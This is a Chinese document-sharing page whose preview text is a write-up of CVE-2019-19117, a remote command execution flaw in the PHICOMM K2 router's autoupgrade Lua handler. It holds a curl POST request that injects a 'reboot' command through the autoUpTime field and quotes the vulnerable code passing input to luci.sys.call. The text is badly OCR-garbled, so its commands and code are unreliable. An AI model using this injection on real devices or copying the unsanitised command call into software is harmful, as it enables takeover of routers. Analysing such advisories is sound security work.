(CVE-2019-19117)PHICOMM 远程代码执行.docx
-
资源ID:493974
资源大小:8.46KB
全文页数:2页
- 资源格式: DOCX
下载积分:5金币
|
友情提示
2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
|
(CVE-2019-19117)PHICOMM 远程代码执行.docx
(CVE-2019-19117) PHICoMM 远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MM K2(PSG1218) V22.5.9.163三、复现过程受影响的源代码文件:usrliblualuciCOntroIIei'adminautoupgrade.lua受影响的函数:SaVe ()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权 限后,向设备发送精心制作的数据包curl -i -s -k -v -X'POST' -e ',http:/192.168.2.lcgi-binluci;stok=xx xxxxx×xxxx" -b "sysauth=4a2c4bdba5fbl273ce62759fd42dba42" -data-bin ary "mode=l&autoUpTime=02%3A051reboot" 'http:/192.168.2.1/cgi-bin/luci /;stok=xx×admin×x××xxxx×,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。 Jj%qnq, i$("#WanCheCkmodaI"). modal("show");$(N#autoUpTimeM)val($("#uptImehourN)val() ":" $(M#uptimeminM).val();SetTimeout(fnction() document. save.submit ();, 1O);我们可以看到,将'autoUpTime,的值直接分配给变量,而无需检查该值是否被恶意 修改,然后发送给服务器。function sve()local time = luci.http.forRvalue(',autoUpTtRe") local node « Iuct.http.forRvalue('node") local upgrading = "1" if node = *l thenluct.sys.cll(uct set sytteR.autoupgrade.up.ttne>%s" % tine)Iuct.sys.call(Muct set systen.autoupgrade.uptype6(a)luct.sys.call(Nuct C0Rtt system,)SCheduletask.settaskatr(systen"r HautoupgradeM, wltb auto upgrade.sh" 9 "yesM, m 16" ,"up tine,)SCheduletask.cfgscdutskbyla(, add,* /system* /(autoupgrdde,) elsetf node = " thenluct.sys.call(Nuct set systen.utouprde.up-typel")luct.sys.call(,uct CoRntt syste,t)Scheduletask. cfgscdutskbylua( "del, /systen" /,utoupgrde") endluci.http.redtrect(Iuct.dispatcher.butldaurI CadntnM ,"nore_syssetM/'autoupradeM),(node=Rde, upgrading upgrading ) end然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使 攻击者想要执行的命令附加到该命令。最后,路由器将执行命令"reboot
